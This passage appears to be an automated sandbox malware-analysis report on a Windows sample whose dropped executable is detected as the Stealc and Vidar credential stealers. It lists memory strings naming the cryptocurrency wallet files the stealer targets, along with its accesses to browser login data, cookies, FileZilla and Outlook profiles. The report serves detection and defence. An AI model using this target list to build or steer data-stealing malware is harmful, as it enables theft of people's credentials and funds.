Source: bfb8bb0dc7.exe, 0000000B.00000002.3076969735.00000000005AD000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: bfb8bb0dc7.exe, 0000000B.00000002.3076969735.00000000005AD000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: bfb8bb0dc7.exe, 0000000B.00000002.3085791494.000000000275C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\keystore
Source: bfb8bb0dc7.exe, 0000000B.00000002.3076969735.00000000005AD000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Yara detected Credential Stealer

Source: Yara match

File source: Process Memory Space: bfb8bb0dc7.exe PID: 3152, type: MEMORYSTR

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 00000024.00000002.3089031616.000000000275A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3085791494.0000000002727000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: bfb8bb0dc7.exe PID: 3152, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bfb8bb0dc7.exe PID: 9104, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: bfb8bb0dc7.exe PID: 3152, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C830C40 sqlite3_bind_zeroblob,	11_2_6C830C40
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C830D60 sqlite3_bind_parameter_name,	11_2_6C830D60
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C758EA0 sqlite3_clear_bindings,	11_2_6C758EA0

Windows Analysis Report
6SoKuOqyNh.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

ID:	1483008
Product:	CloudBasic
Start time:	13:47:11
Start date:	26.07.2024
Sample:	6SoKuOqyNh.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	33a84ea233fe9fe1b4c85e533a228bbd
SHA1:	413d73dd32bcce870cf5edd4b777051762882034
SHA256:	a777bbce91625e3261edebb334be8610372daaf0790763fc2fd085db35b8463d
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Windows Analysis Report 6SoKuOqyNh.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report
6SoKuOqyNh.exe

Malware Threat Intel
Provided by